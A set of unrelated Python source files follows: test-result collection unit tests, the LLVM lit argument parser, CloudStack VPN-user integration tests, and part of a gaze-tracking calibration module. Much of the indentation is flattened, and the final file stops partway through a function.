disabled_test_result = DISABLED_RESULT
client = mock.MagicMock()
disabled_test_result.report_to_result_sink(client)
client.post.assert_called_with(
'disabled/test',
'SKIP',
True,
duration=None,
test_log='',
tags=[('test_name', 'disabled/test'), ('disabled_test', 'true')],
file_artifacts={'name': '/path/to/name'})
# Duplicate calls will only report once.
disabled_test_result.report_to_result_sink(client)
self.assertEqual(client.post.call_count, 1)
disabled_test_result.report_to_result_sink(client)
self.assertEqual(client.post.call_count, 1)
    failed_result = FAILED_RESULT
    client = mock.MagicMock()
    failed_result.report_to_result_sink(client)
client.post.assert_called_with(
'failed/test',
'FAIL',
False,
duration=1233,
file_artifacts={},
tags=[('test_name', 'failed/test')],
test_log='line1\nline2')
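  # Hedged sketch of how a result presumably reaches ResultDB outside of these
  # tests. It relies only on what the mocks above reveal about result_sink_util
  # (a ResultSinkClient with post() and close()); constructor arguments, if any,
  # are omitted here and would need to be filled in:
  #
  #     import result_sink_util
  #     sink = result_sink_util.ResultSinkClient()
  #     FAILED_RESULT.report_to_result_sink(sink)
  #     sink.close()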
class ResultCollectionTest(test_runner_test.TestCase):
"""Tests ResultCollection class APIs."""
def setUp(self):
super(ResultCollectionTest, self).setUp()
self.full_collection = ResultCollection(test_results=[
PASSED_RESULT, FAILED_RESULT, FAILED_RESULT_DUPLICATE, DISABLED_RESULT,
UNEXPECTED_SKIPPED_RESULT, CRASHED_RESULT, FLAKY_PASS_RESULT,
FLAKY_FAIL_RESULT, ABORTED_RESULT
])
def test_init(self):
"""Tests class initialization."""
collection = ResultCollection(
test_results=[
PASSED_RESULT, DISABLED_RESULT, UNEXPECTED_SKIPPED_RESULT
],
crashed=True)
self.assertTrue(collection.crashed)
self.assertEqual(collection.crash_message, '')
self.assertEqual(
collection.test_results,
[PASSED_RESULT, DISABLED_RESULT, UNEXPECTED_SKIPPED_RESULT])
def test_add_result(self):
"""Tests add_test_result."""
collection = ResultCollection(test_results=[FAILED_RESULT])
collection.add_test_result(DISABLED_RESULT)
self.assertEqual(collection.test_results, [FAILED_RESULT, DISABLED_RESULT])
def test_add_result_collection_default(self):
"""Tests add_result_collection default (merge crash info)."""
collection = ResultCollection(test_results=[FAILED_RESULT])
self.assertFalse(collection.crashed)
collection.append_crash_message('Crash1')
crashed_collection = ResultCollection(
test_results=[PASSED_RESULT], crashed=True)
crashed_collection.append_crash_message('Crash2')
collection.add_result_collection(crashed_collection)
self.assertTrue(collection.crashed)
self.assertEqual(collection.crash_message, 'Crash1\nCrash2')
self.assertEqual(collection.test_results, [FAILED_RESULT, PASSED_RESULT])
def test_add_result_collection_overwrite(self):
"""Tests add_result_collection overwrite."""
collection = ResultCollection(test_results=[FAILED_RESULT], crashed=True)
self.assertTrue(collection.crashed)
collection.append_crash_message('Crash1')
crashed_collection = ResultCollection(test_results=[PASSED_RESULT])
collection.add_result_collection(crashed_collection, overwrite_crash=True)
self.assertFalse(collection.crashed)
self.assertEqual(collection.crash_message, '')
self.assertEqual(collection.test_results, [FAILED_RESULT, PASSED_RESULT])
  def test_add_result_collection_ignore(self):
    """Tests add_result_collection with ignore_crash."""
collection = ResultCollection(test_results=[FAILED_RESULT])
self.assertFalse(collection.crashed)
crashed_collection = ResultCollection(
test_results=[PASSED_RESULT], crashed=True)
crashed_collection.append_crash_message('Crash2')
collection.add_result_collection(crashed_collection, ignore_crash=True)
self.assertFalse(collection.crashed)
self.assertEqual(collection.crash_message, '')
self.assertEqual(collection.test_results, [FAILED_RESULT, PASSED_RESULT])
def test_add_results(self):
"""Tests add_results."""
collection = ResultCollection(test_results=[PASSED_RESULT])
collection.add_results([FAILED_RESULT, DISABLED_RESULT])
self.assertEqual(collection.test_results,
[PASSED_RESULT, FAILED_RESULT, DISABLED_RESULT])
def test_add_name_prefix_to_tests(self):
"""Tests add_name_prefix_to_tests."""
passed = copy.copy(PASSED_RESULT)
    disabled = copy.copy(DISABLED_RESULT)
    collection = ResultCollection(test_results=[passed, disabled])
some_prefix = 'Some/prefix'
collection.add_name_prefix_to_tests(some_prefix)
for test_result in collection.test_results:
self.assertTrue(test_result.name.startswith(some_prefix))
def test_add_test_names_status(self):
"""Tests add_test_names_status."""
test_names = ['test1', 'test2', 'test3']
collection = ResultCollection(test_results=[PASSED_RESULT])
collection.add_test_names_status(test_names, TestStatus.SKIP)
disabled_test_names = ['test4', 'test5', 'test6']
collection.add_test_names_status(
disabled_test_names, TestStatus.SKIP, expected_status=TestStatus.SKIP)
self.assertEqual(collection.test_results[0], PASSED_RESULT)
unexpected_skipped = collection.tests_by_expression(
lambda t: not t.expected() and t.status == TestStatus.SKIP)
self.assertEqual(unexpected_skipped, set(['test1', 'test2', 'test3']))
self.assertEqual(collection.disabled_tests(),
set(['test4', 'test5', 'test6']))
@mock.patch('test_result_util.TestResult.report_to_result_sink')
@mock.patch('result_sink_util.ResultSinkClient.close')
@mock.patch('result_sink_util.ResultSinkClient.__init__', return_value=None)
def test_add_and_report_test_names_status(self, mock_sink_init,
mock_sink_close, mock_report):
"""Tests add_test_names_status."""
test_names = ['test1', 'test2', 'test3']
collection = ResultCollection(test_results=[PASSED_RESULT])
collection.add_and_report_test_names_status(test_names, TestStatus.SKIP)
self.assertEqual(collection.test_results[0], PASSED_RESULT)
unexpected_skipped = collection.tests_by_expression(
lambda t: not t.expected() and t.status == TestStatus.SKIP)
self.assertEqual(unexpected_skipped, set(['test1', 'test2', 'test3']))
self.assertEqual(1, len(mock_sink_init.mock_calls))
self.assertEqual(3, len(mock_report.mock_calls))
self.assertEqual(1, len(mock_sink_close.mock_calls))
  def test_append_crash_message(self):
"""Tests append_crash_message."""
collection = ResultCollection(test_results=[PASSED_RESULT])
collection.append_crash_message('Crash message 1.')
self.assertEqual(collection.crash_message, 'Crash message 1.')
collection.append_crash_message('Crash message 2.')
self.assertEqual(collection.crash_message,
'Crash message 1.\nCrash message 2.')
def test_tests_by_expression(self):
"""Tests tests_by_expression."""
collection = self.full_collection
exp = lambda result: result.status == TestStatus.SKIP
skipped_tests = collection.tests_by_expression(exp)
self.assertEqual(skipped_tests,
set(['unexpected/skipped_test', 'disabled/test']))
  def test_get_specific_tests(self):
"""Tests getting sets of tests of specific status."""
collection = self.full_collection
self.assertEqual(
collection.all_test_names(),
set([
'passed/test', 'disabled/test', 'failed/test',
'unexpected/skipped_test', 'crashed/test', 'flaky/test',
'aborted/test'
]))
self.assertEqual(collection.crashed_tests(), set(['crashed/test']))
self.assertEqual(collection.disabled_tests(), set(['disabled/test']))
self.assertEqual(collection.expected_tests(),
set(['passed/test', 'disabled/test', 'flaky/test']))
self.assertEqual(
collection.unexpected_tests(),
set([
'failed/test', 'unexpected/skipped_test', 'crashed/test',
'flaky/test', 'aborted/test'
]))
self.assertEqual(collection.passed_tests(),
set(['passed/test', 'flaky/test']))
self.assertEqual(collection.failed_tests(),
set(['failed/test', 'flaky/test']))
self.assertEqual(collection.flaky_tests(), set(['flaky/test']))
self.assertEqual(
collection.never_expected_tests(),
set([
'failed/test', 'unexpected/skipped_test', 'crashed/test',
'aborted/test'
]))
self.assertEqual(collection.pure_expected_tests(),
set(['passed/test', 'disabled/test']))
  def test_set_crashed_with_prefix(self):
    """Tests set_crashed_with_prefix."""
collection = copy.copy(self.full_collection)
collection.set_crashed_with_prefix('Prefix Line')
self.assertEqual(collection.crash_message, 'Prefix Line\n')
self.assertTrue(collection.crashed)
@mock.patch('test_result_util.TestResult.report_to_result_sink')
@mock.patch('result_sink_util.ResultSinkClient.close')
@mock.patch('result_sink_util.ResultSinkClient.__init__', return_value=None)
def test_report_to_result_sink(self, mock_sink_init, mock_sink_close,
mock_report):
"""Tests report_to_result_sink."""
collection = copy.copy(self.full_collection)
collection.report_to_result_sink()
mock_sink_init.assert_called_once()
self.assertEqual(len(collection.test_results), len(mock_report.mock_calls))
mock_sink_close.assert_called()
@mock.patch('shard_util.shard_index', return_value=0)
@mock.patch('time.time', return_value=10000)
def test_standard_json_output(self, *args):
"""Tests standard_json_output."""
passed_test_value = {
'expected': 'PASS',
'actual': 'PASS',
'shard': 0,
'is_unexpected': False
}
failed_test_value = {
'expected': 'PASS',
'actual': 'FAIL FAIL',
'shard': 0,
'is_unexpected': True
}
disabled_test_value = {
'expected': 'SKIP',
'actual': 'SKIP',
'shard': 0,
'is_unexpected': False
}
unexpected_skip_test_value = {
'expected': 'PASS',
'actual': 'SKIP',
'shard': 0,
'is_unexpected': True
}
crashed_test_value = {
'expected': 'PASS',
'actual': 'CRASH',
'shard': 0,
'is_unexpected': True
}
flaky_test_value = {
'expected': 'PASS',
'actual': 'PASS FAIL',
'shard': 0,
'is_unexpected': False,
'is_flaky': True
}
aborted_test_value = {
'expected': 'PASS',
'actual': 'TIMEOUT',
'shard': 0,
'is_unexpected': True
}
expected_tests = collections.OrderedDict()
expected_tests['passed/test'] = passed_test_value
expected_tests['failed/test'] = failed_test_value
expected_tests['disabled/test'] = disabled_test_value
expected_tests['unexpected/skipped_test'] = unexpected_skip_test_value
expected_tests['crashed/test'] = crashed_test_value
expected_tests['flaky/test'] = flaky_test_value
expected_tests['aborted/test'] = aborted_test_value
expected_num_failures_by_type = {
'PASS': 2,
'FAIL': 1,
'CRASH': 1,
'SKIP': 2,
'TIMEOUT': 1
}
expected_json = {
'version': 3,
'path_delimiter': '/',
'seconds_since_epoch': 10000,
'interrupted': False,
'num_failures_by_type': expected_num_failures_by_type,
'tests': expected_tests
}
self.assertEqual(
self.full_collection.standard_json_output(path_delimiter='/'),
expected_json)
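    # Note on the expected values above: 'actual' concatenates one status token
    # per recorded attempt of a test name, so the two FAIL results for
    # 'failed/test' collapse to 'FAIL FAIL', and the PASS + FAIL attempts for
    # 'flaky/test' become 'PASS FAIL' with 'is_flaky' set instead of
    # 'is_unexpected'.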
def test_test_runner_logs(self):
"""Test test_runner_logs."""
expected_logs = collections.OrderedDict()
expected_logs['passed tests'] = ['passed/test']
expected_logs['disabled tests'] = ['disabled/test']
flaky_logs = ['Failure log of attempt 1:', 'line1', 'line2']
failed_logs = [
'Failure log of attempt 1:', 'line1', 'line2',
'Failure log of attempt 2:', 'line3', 'line4'
]
no_logs = ['Failure log of attempt 1:', '']
expected_logs['flaked tests'] = {'flaky/test': flaky_logs}
expected_logs['failed tests'] = {
'failed/test': failed_logs,
'crashed/test': no_logs,
'unexpected/skipped_test': no_logs,
'aborted/test': no_logs
}
expected_logs['failed/test'] = failed_logs
expected_logs['unexpected/skipped_test'] = no_logs
expected_logs['flaky/test'] = flaky_logs
expected_logs['crashed/test'] = no_logs
expected_logs['aborted/test'] = no_logs
generated_logs = self.full_collection.test_runner_logs()
keys = [
'passed tests', 'disabled tests', 'flaked tests', 'failed tests',
'failed/test', 'unexpected/skipped_test', 'flaky/test', 'crashed/test',
'aborted/test'
]
for key in keys:
self.assertEqual(generated_logs[key], expected_logs[key])
if __name__ == '__main__':
unittest.main()
|
|
import argparse
import os
import shlex
import sys
import lit.reports
import lit.util
def parse_args():
parser = argparse.ArgumentParser(prog='lit')
parser.add_argument('test_paths',
nargs='+',
metavar="TEST_PATH",
help='File or path to include in the test suite')
parser.add_argument('--version',
action='version',
version='%(prog)s ' + lit.__version__)
parser.add_argument("-j", "--threads", "--workers",
dest="workers",
metavar="N",
help="Number of workers used for testing",
type=_positive_int,
default=lit.util.detectCPUs())
parser.add_argument("--config-prefix",
dest="configPrefix",
metavar="NAME",
help="Prefix for 'lit' config files")
parser.add_argument("-D", "--param",
dest="user_params",
metavar="NAME=VAL",
help="Add 'NAME' = 'VAL' to the user defined parameters",
action="append",
default=[])
format_group = parser.add_argument_group("Output Format")
# FIXME: I find these names very confusing, although I like the
# functionality.
format_group.add_argument("-q", "--quiet",
help="Suppress no error output",
action="store_true")
format_group.add_argument("-s", "--succinct",
help="Reduce amount of output",
action="store_true")
format_group.add_argument("-v", "--verbose",
dest="showOutput",
help="Show test output for failures",
action="store_true")
format_group.add_argument("-vv", "--echo-all-commands",
dest="echoAllCommands",
action="store_true",
help="Echo all commands as they are executed to stdout. In case of "
"failure, last command shown will be the failing one.")
format_group.add_argument("-a", "--show-all",
dest="showAllOutput",
help="Display all commandlines and output",
action="store_true")
format_group.add_argument("-o", "--output",
type=lit.reports.JsonReport,
help="Write test results to the provided path",
metavar="PATH")
format_group.add_argument("--no-progress-bar",
dest="useProgressBar",
help="Do not use curses based progress bar",
action="store_false")
format_group.add_argument("--show-unsupported",
help="Show unsupported tests",
action="store_true")
format_group.add_argument("--show-xfail",
help="Show tests that were expected to fail",
action="store_true")
execution_group = parser.add_argument_group("Test Execution")
execution_group.add_argument("--path",
help="Additional paths to add to testing environment",
action="append",
default=[])
execution_group.add_argument("--vg",
dest="useValgrind",
help="Run tests under valgrind",
action="store_true")
execution_group.add_argument("--vg-leak",
dest="valgrindLeakCheck",
help="Check for memory leaks under valgrind",
action="store_true")
execution_group.add_argument("--vg-arg",
dest="valgrindArgs",
metavar="ARG",
help="Specify an extra argument for valgrind",
action="append",
default=[])
execution_group.add_argument("--time-tests",
help="Track elapsed wall time for each test",
action="store_true")
execution_group.add_argument("--no-execute",
dest="noExecute",
help="Don't execute any tests (assume PASS)",
action="store_true")
execution_group.add_argument("--xunit-xml-output",
type=lit.reports.XunitReport,
help="Write XUnit-compatible XML test reports to the specified file")
execution_group.add_argument("--timeout",
dest="maxIndividualTestTime",
help="Maximum time to spend running a single test (in seconds). "
"0 means no time limit. [Default: 0]",
type=_non_negative_int) # TODO(yln): --[no-]test-timeout, instead of 0 allowed
execution_group.add_argument("--max-failures",
help="Stop execution after the given number of failures.",
type=_positive_int)
execution_group.add_argument("--allow-empty-runs",
help="Do not fail the run if all tests are filtered out",
action="store_true")
selection_group = parser.add_argument_group("Test Selection")
selection_group.add_argument("--max-tests",
metavar="N",
help="Maximum number of tests to run",
type=_positive_int)
selection_group.add_argument("--max-time", #TODO(yln): --timeout
dest="timeout",
metavar="N",
help="Maximum time to spend testing (in seconds)",
type=_positive_int)
selection_group.add_argument("--shuffle", # TODO(yln): --order=random
help="Run tests in random order", # default or 'by-path' (+ isEarlyTest())
action="store_true")
selection_group.add_argument("-i", "--incremental", # TODO(yln): --order=failing-first
help="Run modified and failing tests first (updates mtimes)",
action="store_true")
selection_group.add_argument("--filter",
metavar="REGEX",
type=_case_insensitive_regex,
help="Only run tests with paths matching the given regular expression",
default=os.environ.get("LIT_FILTER", ".*"))
selection_group.add_argument("--num-shards", # TODO(yln): --shards N/M
dest="numShards",
metavar="M",
help="Split testsuite into M pieces and only run one",
type=_positive_int,
default=os.environ.get("LIT_NUM_SHARDS"))
selection_group.add_argument("--run-shard",
dest="runShard",
metavar="N",
help="Run shard #N of the testsuite",
type=_positive_int,
default=os.environ.get("LIT_RUN_SHARD"))
debug_group = parser.add_argument_group("Debug and Experimental Options")
debug_group.add_argument("--debug",
help="Enable debugging (for 'lit' development)",
action="store_true")
debug_group.add_argument("--show-suites",
help="Show discovered test suites and exit",
action="store_true")
debug_group.add_argument("--show-tests",
help="Show all discovered tests and exit",
action="store_true")
# LIT is special: environment variables override command line arguments.
env_args = shlex.split(os.environ.get("LIT_OPTS", ""))
args = sys.argv[1:] + env_args
opts = parser.parse_args(args)
# Validate command line options
if opts.echoAllCommands:
opts.showOutput = True
# TODO(python3): Could be enum
if opts.shuffle:
opts.order = 'random'
elif opts.incremental:
opts.order = 'failing-first'
else:
opts.order = 'default'
if opts.numShards or opts.runShard:
if not opts.numShards or not opts.runShard:
parser.error("--num-shards and --run-shard must be used together")
if opts.runShard > opts.numShards:
parser.error("--run-shard must be between 1 and --num-shards (inclusive)")
opts.shard = (opts.runShard, opts.numShards)
else:
opts.shard = None
opts.reports = filter(None, [opts.output, opts.xunit_xml_output])
return opts
def _positive_int(arg):
return _int(arg, 'positive', lambda i: i > 0)
def _non_negative_int(arg):
return _int(arg, 'non-negative', lambda i: i >= 0)
def _int(arg, kind, pred):
desc = "requires {} integer, but found '{}'"
try:
i = int(arg)
except ValueError:
raise _error(desc, kind, arg)
if not pred(i):
raise _error(desc, kind, arg)
return i
def _case_insensitive_regex(arg):
import re
try:
return re.compile(arg, re.IGNORECASE)
except re.error as reason:
raise _error("invalid regular expression: '{}', {}", arg, reason)
def _error(desc, *args):
msg = desc.format(*args)
return argparse.ArgumentTypeError(msg)
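# Illustrative usage note (a sketch, not part of upstream lit): because parse_args()
# appends LIT_OPTS after sys.argv, an environment value wins whenever argparse keeps
# only the last occurrence of an option. For example, assuming a test tree in tests/:
#
#   LIT_OPTS="-j4 --filter=Vector" lit -j8 -sv tests/
#
# would run with 4 workers and the case-insensitive filter "Vector", while -sv from
# the command line still applies. Options coming from the environment pass through
# the same validators (_positive_int, _case_insensitive_regex) as command-line ones.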
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" P1 tests for VPN users
"""
# Import Local Modules
from nose.plugins.attrib import attr
from marvin.cloudstackException import cloudstackAPIException
from marvin.cloudstackTestCase import cloudstackTestCase
from marvin.integration.lib.base import (
Account,
ServiceOffering,
VirtualMachine,
PublicIPAddress,
Vpn,
VpnUser,
Configurations,
NATRule
)
from marvin.integration.lib.common import (get_domain,
get_zone,
get_template,
cleanup_resources,
)
class Services:
"""Test VPN users Services
"""
def __init__(self):
self.services = {
"account": {
"email": "test@test.com",
"firstname": "Test",
"lastname": "User",
"username": "test",
# Random characters are appended for unique
# username
"password": "password",
},
"service_offering": {
"name": "Tiny Instance",
"displaytext": "Tiny Instance",
"cpunumber": 1,
"cpuspeed": 100, # in MHz
"memory": 128, # In MBs
},
"disk_offering": {
"displaytext": "Small Disk Offering",
"name": "Small Disk Offering",
"disksize": 1
},
"virtual_machine": {
"displayname": "TestVM",
"username": "root",
"password": "password",
"ssh_port": 22,
"hypervisor": 'KVM',
"privateport": 22,
"publicport": 22,
"protocol": 'TCP',
},
"vpn_user": {
"username": "test",
"password": "test",
},
"natrule": {
"privateport": 1701,
"publicport": 1701,
"protocol": "UDP"
},
"ostype": 'CentOS 5.5 (64-bit)',
"sleep": 60,
"timeout": 10,
# Networking mode: Advanced, Basic
}
class TestVPNUsers(cloudstackTestCase):
@classmethod
def setUpClass(cls):
cls.api_client = super(TestVPNUsers,
cls).getClsTestClient().getApiClient()
cls.services = Services().services
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client, cls.services)
cls.zone = get_zone(cls.api_client, cls.services)
cls.services["mode"] = cls.zone.networktype
cls.template = get_template(
cls.api_client,
cls.zone.id,
cls.services["ostype"]
)
cls.services["virtual_machine"]["zoneid"] = cls.zone.id
cls.service_offering = ServiceOffering.create(
cls.api_client,
cls.services["service_offering"]
)
cls._cleanup = [cls.service_offering, ]
return
@classmethod
def tearDownClass(cls):
try:
# Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
try:
self.apiclient = self.testClient.getApiClient()
self.dbclient = self.testClient.getDbConnection()
self.account = Account.create(
self.apiclient,
self.services["account"],
domainid=self.domain.id
)
self.cleanup = [
self.account,
]
self.virtual_machine = VirtualMachine.create(
self.apiclient,
self.services["virtual_machine"],
templateid=self.template.id,
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id
)
self.public_ip = PublicIPAddress.create(
self.apiclient,
accountid=self.virtual_machine.account,
zoneid=self.virtual_machine.zoneid,
domainid=self.virtual_machine.domainid,
services=self.services["virtual_machine"]
)
return
except cloudstackAPIException as e:
self.tearDown()
raise e
def tearDown(self):
try:
# Clean up, terminate the created instance, volumes and snapshots
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def create_VPN(self, public_ip):
"""Creates VPN for the network"""
self.debug("Creating VPN with public IP: %s" % public_ip.ipaddress.id)
try:
# Assign VPN to Public IP
vpn = Vpn.create(self.apiclient,
self.public_ip.ipaddress.id,
account=self.account.name,
domainid=self.account.domainid)
self.debug("Verifying the remote VPN access")
vpns = Vpn.list(self.apiclient,
publicipid=public_ip.ipaddress.id,
listall=True)
self.assertEqual(
isinstance(vpns, list),
True,
"List VPNs shall return a valid response"
)
return vpn
except Exception as e:
self.fail("Failed to create remote VPN access: %s" % e)
def create_VPN_Users(self, rand_name=True, api_client=None):
"""Creates VPN users for the network"""
self.debug("Creating VPN users for account: %s" %
self.account.name)
if api_client is None:
api_client = self.apiclient
try:
vpnuser = VpnUser.create(
api_client,
self.services["vpn_user"]["username"],
self.services["vpn_user"]["password"],
account=self.account.name,
domainid=self.account.domainid,
rand_name=rand_name
)
self.debug("Verifying the remote VPN access")
vpn_users = VpnUser.list(self.apiclient,
id=vpnuser.id,
listall=True)
self.assertEqual(
isinstance(vpn_users, list),
True,
"List VPNs shall return a valid response"
)
return vpnuser
except Exception as e:
self.fail("Failed to create remote VPN users: %s" % e)
@attr(tags=["advanced", "advancedns"])
@attr(configuration='remote.access.vpn.user.limit')
def test_01_VPN_user_limit(self):
"""VPN remote access user limit tests"""
# Validate the following
# prerequisite: change management configuration setting of
# remote.access.vpn.user.limit
# 1. provision more users than is set in the limit
# Provisioning of users beyond the limit should fail
self.debug("Fetching the limit for remote access VPN users")
configs = Configurations.list(
self.apiclient,
name='remote.access.vpn.user.limit',
listall=True)
self.assertEqual(isinstance(configs, list),
True,
"List configs should return a valid response")
limit = int(configs[0].value)
self.debug("Enabling the VPN access for IP: %s" %
self.public_ip.ipaddress)
self.create_VPN(self.public_ip)
self.debug("Creating %s VPN users" % limit)
for x in range(limit):
self.create_VPN_Users()
self.debug("Adding another user exceeding limit for remote VPN users")
with self.assertRaises(Exception):
self.create_VPN_Users()
self.debug("Limit exceeded exception raised!")
return
@attr(tags=["advanced", "advancedns"])
def test_02_use_vpn_port(self):
"""Test create VPN when L2TP port in use"""
# Validate the following
# 1. set a port forward for UDP: 1701 and enable VPN
# 2. set port forward rule for the udp port 1701 over which L2TP works
# 3. port forward should prevent VPN from being enabled
self.debug("Creating a port forwarding rule on port 1701")
# Create NAT rule
nat_rule = NATRule.create(
self.apiclient,
self.virtual_machine,
self.services["natrule"],
self.public_ip.ipaddress.id)
self.debug("Verifying the NAT rule created")
nat_rules = NATRule.list(self.apiclient, id=nat_rule.id, listall=True)
self.assertEqual(isinstance(nat_rules, list),
True,
"List NAT rules should return a valid response")
self.debug("Enabling the VPN connection for IP: %s" %
self.public_ip.ipaddress)
with self.assertRaises(Exception):
self.create_VPN(self.public_ip)
self.debug("Create VPN connection failed! Test successful!")
return
@attr(tags=["advanced", "advancedns"])
def test_03_enable_vpn_use_port(self):
"""Test create NAT rule when VPN when L2TP enabled"""
# Validate the following
# 1. Enable a VPN connection on source NAT
# 2. Add a VPN user
# 3. add a port forward rule for UDP port 1701. Should result in error
# saying that VPN is enabled over port 1701
self.debug("Enabling the VPN connection for IP: %s" %
self.public_ip.ipaddress)
self.create_VPN(self.public_ip)
self.debug("Creating a port forwarding rule on port 1701")
# Create NAT rule
with self.assertRaises(Exception):
NATRule.create(
self.apiclient,
self.virtual_machine,
self.services["natrule"],
self.public_ip.ipaddress.id)
self.debug("Create NAT rule failed! Test successful!")
return
@attr(tags=["advanced", "advancedns"])
def test_04_add_new_users(self):
"""Test add new users to existing VPN"""
# Validate the following
# 1. Enable a VPN connection on source NAT
# 2. Add new user to VPN when there are already existing users.
# 3. We should be able to successfully establish a VPN connection using
# the newly added user credential.
self.debug("Enabling the VPN connection for IP: %s" %
self.public_ip.ipaddress)
self.create_VPN(self.public_ip)
try:
self.debug("Adding new VPN user to account: %s" %
self.account.name)
self.create_VPN_Users()
# TODO: Verify the VPN connection
self.debug("Adding another user to account")
self.create_VPN_Users()
# TODO: Verify the VPN connection with new user
except Exception as e:
self.fail("Failed to create new VPN user: %s" % e)
return
@attr(tags=["advanced", "advancedns"])
def test_05_add_duplicate_user(self):
"""Test add duplicate user to existing VPN"""
# Validate the following
# 1. Enable a VPN connection on source NAT
# 2. Add a VPN user, say "abc", that is already an existing user of the VPN.
# 3. Adding this VPN user should fail.
self.debug("Enabling the VPN connection for IP: %s" %
self.public_ip.ipaddress)
self.create_VPN(self.public_ip)
self.debug("Adding new VPN user to account: %s" %
self.account.name)
self.create_VPN_Users(rand_name=False)
# TODO: Verify the VPN connection
self.debug("Adding another user to account with same username")
with self.assertRaises(Exception):
self.create_VPN_Users(rand_name=False)
return
@attr(tags=["advanced", "advancedns"])
def test_06_add_VPN_user_global_admin(self):
"""Test as global admin, add a new VPN user to an existing VPN entry
that was created by another account."""
# Steps for verification
# 1. Create a new user and deploy few Vms.
# 2. Enable VPN access. Add few VPN users.
# 3. Make sure that VPN access works as expected.
# 4. As global Admin , add VPN user to this user's existing VPN entry.
# Validate the following
# 1. The newly added VPN user should get configured to the router of
# user account.
# 2. We should be able to use this newly created user credential to
# establish a VPN connection that gives access to all VMs of this user
self.debug("Enabling VPN connection to account: %s" %
self.account.name)
self.create_VPN(self.public_ip)
self.debug("Creating VPN user for the account: %s" %
self.account.name)
self.create_VPN_Users()
self.debug("Creating a global admin account")
admin = Account.create(self.apiclient,
self.services["account"],
admin=True,
domainid=self.account.domainid)
self.cleanup.append(admin)
self.debug("Creating API client for newly created user")
api_client = self.testClient.createUserApiClient(
UserName=self.account.name,
DomainName=self.account.domain)
self.debug("Adding new user to VPN as a global admin: %s" %
admin.name)
try:
self.create_VPN_Users(api_client=api_client)
except Exception as e:
self.fail("Global admin should be allowed to create VPN user: %s" %
e)
return
@attr(tags=["advanced", "advancedns"])
def test_07_add_VPN_user_domain_admin(self):
"""Test as domain admin, add a new VPN user to an existing VPN entry
that was created by another account."""
# Steps for verification
# 1. Create a new user and deploy few Vms.
# 2. Enable VPN access. Add few VPN users.
# 3. Make sure that VPN access works as expected.
# 4. As domain Admin , add VPN user to this user's existing VPN entry.
# Validate the following
# 1. The newly added VPN user should get configured to the router of
# user account.
# 2. We should be able to use this newly created user credential to
# establish a VPN connection that gives access to all VMs of this user
self.debug("Enabling VPN connection to account: %s" %
self.account.name)
self.create_VPN(self.public_ip)
self.debug("Creating VPN user for the account: %s" %
self.account.name)
self.create_VPN_Users()
self.debug("Creating a domain admin account")
admin = Account.create(self.apiclient,
self.services["account"],
domainid=self.account.domainid)
self.cleanup.append(admin)
self.debug("Creating API client for newly created user")
api_client = self.testClient.createUserApiClient(
UserName=self.account.name,
DomainName=self.account.domain)
self.debug("Adding new user to VPN as a domain admin: %s" %
admin.name)
try:
self.create_VPN_Users(api_client=api_client)
except Exception as e:
self.fail("Domain admin should be allowed to create VPN user: %s" %
e)
return
|
|
#!/usr/bin/env python
#
# Gaze tracking calibration
# - use calibration video heatmap and priors
#
# AUTHOR : Mike Tyszka
# PLACE : Caltech
# DATES : 2014-05-15 JMT From scratch
#
# This file is part of mrgaze.
#
# mrgaze is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# mrgaze is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with mrgaze. If not, see <http://www.gnu.org/licenses/>.
#
# Copyright 2014 California Institute of Technology.
import os
import cv2
import json
import numpy as np
import pylab as plt
from skimage import filters, exposure
from scipy import ndimage
from mrgaze import moco, engine
def AutoCalibrate(ss_res_dir, cfg):
'''
Automatic calibration transform from pupil center timeseries
'''
# Get fixation heatmap percentile limits and Gaussian blur sigma
pmin = cfg.getfloat('CALIBRATION', 'heatpercmin')
pmax = cfg.getfloat('CALIBRATION', 'heatpercmax')
plims = (pmin, pmax)
sigma = cfg.getfloat('CALIBRATION', 'heatsigma')
# Get target coordinates
targetx = json.loads(cfg.get('CALIBRATION', 'targetx'))
targety = json.loads(cfg.get('CALIBRATION', 'targety'))
# Gaze space target coordinates (n x 2)
targets = np.array([targetx, targety]).transpose()
# Calibration pupilometry file
cal_pupils_csv = os.path.join(ss_res_dir,'cal_pupils.csv')
if not os.path.isfile(cal_pupils_csv):
print('* Calibration pupilometry not found - returning')
return False
# Read raw pupilometry data
p = engine.ReadPupilometry(cal_pupils_csv)
# Extract useful timeseries
t = p[:,0] # Video soft timestamp
px = p[:,2] # Video pupil center, x
py = p[:,3] # Video pupil center, y
blink = p[:,4] # Video blink
# Remove NaNs (blinks, etc) from t, x and y
ok = np.where(blink == 0)
t, x, y = t[ok], px[ok], py[ok]
# Find spatial fixations and sort temporally
# Returns heatmap with axes
fixations, hmap, xedges, yedges = FindFixations(x, y, plims, sigma)
# Temporally sort fixations - required for matching to targets
fixations = SortFixations(t, x, y, fixations)
# Plot labeled calibration heatmap to results directory
PlotCalibration(ss_res_dir, hmap, xedges, yedges, fixations)
# Check for autocalibration problems
n_targets = targets.shape[0]
n_fixations = fixations.shape[0]
if n_targets == n_fixations:
# Compute calibration mapping video to gaze space
C = CalibrationModel(fixations, targets)
# Determine central fixation coordinate in video space
central_fix = CentralFixation(fixations, targets)
# Write calibration results to CSV files in the results subdir
WriteCalibration(ss_res_dir, fixations, C, central_fix)
else:
print('* Number of detected fixations (%d) and targets (%d) differ - exiting' % (n_fixations, n_targets))
# Return empty/dummy values
C = np.array([])
